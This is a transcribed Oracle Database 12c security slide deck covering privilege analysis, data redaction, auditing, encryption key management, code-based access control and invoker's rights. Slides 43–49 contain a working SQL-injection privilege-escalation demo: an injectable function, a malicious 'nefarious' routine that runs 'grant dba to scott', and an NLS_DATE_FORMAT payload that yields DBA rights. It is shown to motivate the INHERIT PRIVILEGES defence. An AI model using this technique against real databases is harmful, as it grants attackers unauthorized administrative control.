Copyright 2012, Oracle and/or its affiliates. All rights reserved. Insert Information Protection Policy Classification from Slide 13

Transcription

1 1

2 What s New in Security in the Latest Generation of Database Technology Thomas Kyte 2

3 The following is intended to outline our general product direction. It is intended for information purposes only, and may not be incorporated into any contract. It is not a commitment to deliver any material, code, or functionality, and should not be relied upon in making purchasing decisions. The development, release, and timing of any features or functionality described for Oracle s products remains at the sole discretion of Oracle. 3

4 Program Agenda Privilege Analysis Data Redaction Auditing Encryption Advancements Code Based Access Control Invokers Rights Separation of duties 4

5 Privilege Analysis 5

6 Privilege Analysis You want to use the concept of least privileges Problem: You don t know what privileges they really need, maybe just give them SELECT ANY TABLE That is not very secure and hard to justify to an auditor 6

7 Privilege Analysis Can now track privilege use by Entire database, all users except SYS, any privilege used A set of roles, if someone uses a specific set of roles privileges, we record it A condition based on SYS_CONTEXT (all of the userenv stuff like session_user, action, module, etc) A combination of a set of roles and a condition For example 7

8 Privilege Analysis c##tkyte%pdb1> begin 2 dbms_privilege_capture.create_capture 3 ( name => 'Entire_Database_Capture', 4 description => 'Capture all privileges for all non-sys users', 5 type => dbms_privilege_capture.g_database 6 ); 7 end; 8 / PL/SQL procedure successfully completed. Capture for the entire database, any privilege used, all users (except SYS) 8

9 Privilege Analysis c##tkyte%pdb1> begin 2 dbms_privilege_capture.create_capture 3 ( name => 'Scott_Capture', 4 description => 'Capture all privileges for just SCOTT', 5 type => dbms_privilege_capture.g_context, 6 condition => q' sys_context( 'userenv', 'session_user' ) = 'SCOTT' ' 7 ); 8 end; 9 / PL/SQL procedure successfully completed. Capture for SCOTT. Will get recursive privileges if SCOTT runs some definers rights code. 9

10 Privilege Analysis c##tkyte%pdb1> begin 2 dbms_privilege_capture.enable_capture 3 ( name => 'Scott_Capture' ); 4 end; 5 / PL/SQL procedure successfully completed. You will start and stop capturing, do this during some period of normal activity 10

11 Privilege Analysis c##tkyte%pdb1> connect Connected. scott%pdb1> select * from dual; D - X scott%pdb1> create table t ( x int ); Table created. scott%pdb1> drop table t; Table dropped. Do some work as SCOTT, use privileges 11

12 Privilege Analysis c##tkyte%pdb1> begin 2 dbms_privilege_capture.disable_capture 3 ( name => 'Scott_Capture' ); 4 end; 5 / PL/SQL procedure successfully completed. c##tkyte%pdb1> begin 2 dbms_privilege_capture.generate_result 3 ( name => 'Scott_Capture' ); 4 end; 5 / PL/SQL procedure successfully completed. Stop capturing and cause the details to be flushed to disk from cache. 12

13 Privilege Analysis c##tkyte%pdb1> select used_role, sys_priv, obj_priv, owner, object 2 from dba_used_privs 3 where capture = 'Scott_Capture' 4 and username = 'SCOTT' 5 order by sequence; USED_ROLE SYS_PRIV OBJ_PRIV OWNER OBJECT SCOTT CREATE SESSION PUBLIC USE SYS ORA$BASE PUBLIC SELECT SYS DUAL PUBLIC SELECT SYSTEM PRODUCT_PRIVS PUBLIC EXECUTE SYS DBMS_APPLICATION_INFO SCOTT CREATE TABLE PUBLIC EXECUTE SYS DBMS_UTILITY PUBLIC EXECUTE SYS DBMS_OUTPUT PUBLIC EXECUTE SYS DBMSOUTPUT_LINESARRAY PUBLIC SELECT SYS GLOBAL_NAME PUBLIC SELECT SYS DUAL 11 rows selected. Report on what was used many other views (show what wasn t used for example) as well 13

14 Data Redaction 14

15 Oracle Data Redaction Redacting Sensitive Data for Applications Policy Credit Card # On-the-fly redaction based upon user name, IP address, application context, and other factors Transparent, consistent enforcement in the database Minimal impact on production work loads Call Centers Decision Support Systems Systems with PII, PHI, PCI data 15

16 Supported Transformations Full Redaction Partial Redaction RegExp Redaction Random Redaction Original à Redacted 05/24/75 à 01/01/01 11 Rock Bluff Dr. à XXXXXXX à ***-**-2299 D1L86YZV8K à D1******8K à [hidden] à à /30/73 à 11/14/85 16

17 Data Redaction Example c##tkyte%pdb1> create table t( ccnum varchar2(20) ); Table created. c##tkyte%pdb1> insert into t (ccnum) values ( ' ' ); 1 row created. We would like to protect the credit card number by masking the first 12 digits. 17

18 Data Redaction Example c##tkyte%pdb1> BEGIN 2 DBMS_REDACT.ADD_POLICY( 3 object_schema => user, 4 object_name => 'T', 5 column_name => 'CCNUM', 6 policy_name => 'hide_credit_card', 7 function_type => DBMS_REDACT.PARTIAL, 8 function_parameters => 'vvvvfvvvvfvvvvfvvvv,vvvv-vvvv-vvvv-vvvv,*,1,12', 9 expression => '1=1'); 10 END; 11 / PL/SQL procedure successfully completed. We add a policy to the column 18

19 Data Redaction Example c##tkyte%pdb1> grant select on t to scott; Grant succeeded. c##tkyte%pdb1> select * from t; CCNUM The raw data 19

20 Data Redaction Example c##tkyte%pdb1> connect Connected. scott%pdb1> select * from c##tkyte.t; CCNUM ****-****-****-3456 Now fully redacted for other users. 20

21 Data Redaction Example scott%pdb1> select * from c##tkyte.t where ccnum like '1234%'; CCNUM ****-****-****-3456 scott%pdb1> select * from c##tkyte.t where ccnum like '1234%'; CCNUM ****-****-****-3456 Does not break the application, just obscures the output data 21

22 Auditing 22

23 Unified Auditing Single Audit trail for Database Installation Database Vault Label Security Real Application Security RMAN Data Pump Direct Path Loads 23

24 Enhanced Security of Audit Trail Created in an INSERT ONLY tablespace Audit trail is managed only via the audit trail package DBMS_AUDIT_MGMT Only administrators with new role can access that Separation of Duty Audit administrator role to create and implement audit trails Audit user role to view audit data 24

25 Encryption Advancements 25

26 Summary of Encryption Key Architecture Hardware Security Module (HSM) Tablespace Key Table Key Standard Wallet Auto-Login Wallet Master Key Local Auto-Login Wallet Oracle Wallet Tablespace Encryption Column Encryption 26

27 Transparent Data Encryption New key attributes to help track key expiration, last rekey, etc. New data dictionary views to summarize keys and their attributes New commands to consolidate actions previously in distinct utilities New import/export/merge feature to move keys between wallets New migrate/reverse migrate to move keys between wallet & HSM New automatic backup of wallet-based keystores Updated TDE homepage in Enterprise Manager for simple web-based management of keys and keystores 27

28 Example Commands in 12c See the new key attributes using the new views sql> select tag, activation_time from v$encryption_keys Use the new key management commands instead of legacy utilities sql> administer key management create keystore sql> administer key management set keystore open Use the new import/export/merge operations to move keys sql> administer key management export/import/merge keystore Leverage the automatic backup of wallet-based keystores sql> administer key management set key with backup; 28

29 Transparent Data Encryption Enterprise Manager Screenshot 29

30 About Pluggable Databases Oracle Database 12c CDB-1 Pluggable Database PDB-A Oracle Database 12c CDB-2 Pluggable Database PDB-B Unplug & Plug PDB Pluggable Database PDB-C Pluggable Database PDB-B 30

31 Transparent Data Encryption Managing Keys for Pluggable Databases The wallet lives in the host environment, not within pluggable DBs A single wallet may be accessed by multiple pluggable DBs running on the host Each pluggable DB using encryption has a TDE master key stored in the wallet TDE master keys are managed independently within the wallet Are rotated within the wallet independently Can be imported/exported between wallets When moving a pluggable DB that uses encryption to a new host, you must move its TDE master key as well Use key import/export to move the TDE master key from one host to another 31

32 Transparent Data Encryption Example of Key Movement for Pluggable Databases Oracle Database 12c CDB-1 Pluggable Database PDB-A Oracle Database 12c CDB-2 Pluggable Database PDB-B Oracle Wallet WALLET-1 Unplug & Plug PDB Export & Import Key Pluggable Database PDB-C Pluggable Database PDB-B Oracle Wallet WALLET-2 32

33 Other New TDE Items in Oracle Database 12c Wallet storage directly in Oracle RAC/ASM Customers now can use a single shared wallet configuration for Oracle RAC with the wallet being stored directly in Oracle ASM (no Oracle ACFS/OCFS required) Updated FIPS 140 validation New embedded encryption library licensed from RSA which they are explicitly validating for FIPS 140 Improved Separation of Duties New grantable SYSKM allows basic wallet operations to be performed by the I.T. Security Officer with no ALTER SYSTEM privilege (for separation of duties) and to do basic key management before the database is fully open Cryptographic hardware acceleration on Windows Now TDE running on Windows will be accelerated, similar to Linux & Solaris 33

34 Code Based Access Control 34

35 Code Based Access Control A role may be granted to a PL/SQL unit (package, procedure, function) That role will be enabled during the execution of the unit But still not during the compilation so this will be only about dynamic SQL for a definers rights routine 35

36 Code Based Access Control c##tkyte%pdb1> create user utility identified by utility; User created. c##tkyte%pdb1> create role util_role; Role created. c##tkyte%pdb1> grant create session, create procedure, create table to util_role; Grant succeeded. c##tkyte%pdb1> grant util_role to utility; Grant succeeded. Create a utility account and give it privileges via a ROLE 36

37 Code Based Access Control c##tkyte%pdb1> connect Connected. utility%pdb1> utility%pdb1> create or replace procedure do_something 2 as 3 begin 4 execute immediate ' 5 create table t 6 ( x int )'; 7 end; 8 / Procedure created. The procedure creates successfully, however 37

38 Code Based Access Control utility%pdb1> exec do_something BEGIN do_something; END; * ERROR at line 1: ORA-01031: insufficient privileges ORA-06512: at "UTILITY.DO_SOMETHING", line 4 ORA-06512: at line 1 Roles are historically never enabled during the execution of a definers rights routine. But 38

39 Code Based Access Control utility%pdb1> grant util_role to procedure do_something; Grant succeeded. utility%pdb1> exec do_something PL/SQL procedure successfully completed. utility%pdb1> set linesize 40 utility%pdb1> desc t Name Null? Type X NUMBER(38) Now you can grant a role to a procedure/ function/ package 39

40 Code Based Access Control Think about the interesting uses with invokers rights routines now. They historically ran with the privileges (direct grants and roles) of the invoker Now can run with those and some role granted to the procedure 40

41 Invokers Rights 41

42 Invokers Rights Invokers Rights routines ran with the privileges of the invoker The invoker might be much higher privileged than the owner of the procedure Can be used to steal privileges by the owner 42

43 Invokers Rights Create or function seemingly_nice_utility As Begin execute immediate grant dba to me ; do_something_useful; End; If that seemingly nice routine was executed by a highly privileged user, the owner of this nice utility would become a DBA 43

44 Invokers Rights ops$tkyte%ora11gr2> create or replace 2 function injectable( p_date in date ) 3 return number 4 as 5 l_sql varchar2(1000); 6 l_cnt number; 7 begin 8 dbms_output.put_line( 'enter' ); 9 l_sql := ' 10 select count(*) 11 into :n 12 from all_users 13 where created = ''' p_date ''''; dbms_output.put_line( l_sql ); 16 execute immediate l_sql into l_cnt; 17 return l_cnt; 18 end; 19 / Function created. Or suppose you have a SQL injectable routine 44

45 Invokers Rights ops$tkyte%ora11gr2> exec dbms_output.put_line( injectable( sysdate ) ) enter select count(*) into :n from all_users where created = '28-SEP-12' 0 PL/SQL procedure successfully completed. That is what the developer is expecting and in fact what the developer has always seen But 45

46 Invokers Rights scott%ora11gr2> create or replace 2 function nefarious 3 return date 4 authid current_user 5 as 6 pragma autonomous_transaction; 7 begin 8 dbms_output.put_line( 'in routine' ); 9 execute immediate 'grant dba to scott'; 10 dbms_output.put_line( 'granted' ); 11 return sysdate; 12 end; 13 / Function created. Scott knows this SQL injection bug exists, Scott knows the owner of the bad code is highly privileged, Scott has connect and resource.. 46

47 Invokers Rights scott%ora11gr2> grant execute on nefarious to ops$tkyte; Grant succeeded. scott%ora11gr2> alter session set nls_date_format = '"'' or scott.nefarious() is not null--"'; Session altered. scott%ora11gr2> select sysdate from dual; SYSDATE ' or scott.nefarious() is not null-- That is a surprise to many people 47

48 Invokers Rights scott%ora11gr2> select * from session_roles; ROLE CONNECT RESOURCE scott%ora11gr2> exec dbms_output.put_line( ops$tkyte.injectable(sysdate) ) enter select count(*) into :n from all_users where created = '' or scott.nefarious() is not null--' in routine granted 38 PL/SQL procedure successfully completed. All we have to do is trick that highly privileged user into running for us, just as I did here.. And then. 48

49 Invokers Rights scott%ora11gr2> connect scott/tiger Connected. scott%ora11gr2> select * from session_roles; ROLE CONNECT RESOURCE DBA SELECT_CATALOG_ROLE EXECUTE_CATALOG_ROLE XDB_SET_INVOKER OLAP_DBA OLAP_XS_ADMIN PLUSTRACE 22 rows selected. Not good 49

50 Invokers Rights Two new privileges: INHERIT PRIVILEGES By default PUBLIC has INHERIT PRIVILEGES on all newly created and upgraded user accounts Hence it works the same in 12c by default Consider revoke inherit privileges on user username from public INHERIT ANY PRIVILEGES Use sparingly 50

51 Invokers Rights scott%pdb1> exec dbms_output.put_line( c##tkyte.injectable(sysdate) ) enter select count(*) into :n from all_users where created = '' or scott.nefarious() is not null--' BEGIN dbms_output.put_line( c##tkyte.injectable(sysdate) ); END; * ERROR at line 1: ORA-06598: insufficient INHERIT PRIVILEGES privilege ORA-06512: at "SCOTT.NEFARIOUS", line 1 ORA-06512: at "C##TKYTE.INJECTABLE", line 15 ORA-06512: at line 1 After issuing the revoke, the schema containing code that is potentially SQL injectable (pretty much most any application schema!) cannot be exploited this way 51

52 Invokers Rights Extended to VIEWS Historically invokers rights routines always ran with definers rights in a view Now can run with definers rights CREATE VIEW VW BEQUEATH DEFINER AS.. Or invokers rights CREATE VIEW VW BEQUEATH CURRENT_USER AS.. Only affects the invocation of invokers rights routines in a view 52

53 Separation of Duties 53

54 Separation of Duties In the past we had SYSDBA, pretty much everything SYS user SYSOPER, much more limited PUBLIC user Create spfile, Open/Mount database, Archivlog, Complete recovery, startup, shutdown So everyone just used SYSDBA 54

55 Separation of Duties - SYSBACKUP Use this to use RMAN instead of SYSDBA Startup/shutdown Very specific set of system privileges (security guide has the complete list) Very few specific object privileges Very few Execute privileges Just enough to backup 55

56 Separation of Duties - SYSDG Use this to use Data Guard instead of SYSDBA Startup/shutdown Very few system privileges (security guide has the complete list) Very few specific object privileges Very few Execute privileges Just enough to run Data Guard 56

57 Separation of Duties - SYSKM Use this to perform key management instead of SYSDBA Administer key management, create session, select on a few v$ tables Just enough to perform key management 57

58 Separation of Duties - Auditing Already mentioned New role to administer New role to use 58

59 What we looked at Privilege Analysis Data Redaction Auditing Encryption Advancements Code Based Access Control Invokers Rights Separation of duties 59

60 The preceding is intended to outline our general product direction. It is intended for information purposes only, and may not be incorporated into any contract. It is not a commitment to deliver any material, code, or functionality, and should not be relied upon in making purchasing decisions. The development, release, and timing of any features or functionality described for Oracle s products remains at the sole discretion of Oracle. 60

61 Graphic Section Divider 61

62 62